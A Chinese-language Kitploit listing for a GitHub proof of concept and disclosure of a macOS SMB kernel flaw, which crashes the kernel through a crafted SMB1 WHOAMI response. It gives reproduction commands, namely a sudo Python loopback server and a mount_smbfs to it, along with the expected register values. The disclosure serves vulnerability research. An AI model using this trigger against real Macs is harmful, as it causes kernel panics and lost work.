Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-84543 — CVE-2026-84543 的概念验证与技术披露,该漏洞是 macOS SMB 内核漏洞,可通过精心构造的 SMB1 响应触发内核崩溃。 | Kitploit
工具/GitHubGitHub/petermalone/cve-2026-84543
漏洞分析漏洞利用论文与研究二进制利用
GitHubpetermalone/cve-2026-84543

CVE-2026-84543

CVE-2026-84543 的概念验证与技术披露,该漏洞是 macOS SMB 内核漏洞,可通过精心构造的 SMB1 响应触发内核崩溃。

查看仓库
7217小时25分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概念验证

此概念验证预计会导致受影响的 Mac 发生内核崩溃并重启。

研究中使用的受影响测试版本为 macOS Tahoe 26.4 (25E246) 和 macOS 26.5 beta 4 (25F5068a)。Apple 已在 macOS Golden Gate 27、Tahoe 26.7 和 Sequoia 15.8 中修复了 CVE-2026-84543。

包含的 PoC

smb1_unix_whoami_poc.py 是回环证据捕获服务器。它仅使用 Python 标准库,并且:

  • 在 Apple 芯片上读取当前启动的 _COMM_PAGE_ASB_TARGET_KERN_VALUE;
  • 在回环上提供来宾 SMB1 共享;
  • 返回精心构造的 SMB_QFS_POSIX_WHOAMI(0x0202)响应,以创建不一致的计数/指针状态;以及
  • 返回包含可识别金丝雀值的 UNIX_INFO2(0x020B)属性,用于崩溃寄存器溯源。

复现

在终端 A 中:

root@kitploit:~
cd poc
sudo python3 smb1_unix_whoami_poc.py \
  --bind 127.0.0.1 \
  --port 445 \
  --log /tmp/CVE-2026-84543-poc.log

记录打印出的 ASB_TARGET_KERN_VALUE;它在启动时随机化。

在终端 B 中:

root@kitploit:~
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543

预期的寄存器关系

当 T 等于启动时打印的内核值金丝雀时:

root@kitploit:~
x8  = T
x9  = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1

x8、x9 和 x11 中的特定位确立了溯源。观察到的关系在服务器响应字段与实时内核寄存器状态之间提供了逐字节的关联。

下载工具